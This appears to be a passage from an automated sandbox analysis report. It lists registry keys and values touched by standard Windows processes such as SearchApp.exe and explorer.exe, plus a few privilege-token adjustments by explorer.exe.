Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3642458265-1901903390-453309326-1000\{01F335E3-116A-44B8-9A60-FB114F4828FF} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3642458265-1901903390-453309326-1000\{7DFF2A75-63E2-405F-8B9E-F885FB935DF0} C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3642458265-1901903390-453309326-1000\{A5B63874-4B71-4074-841A-5A07F07E9565} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
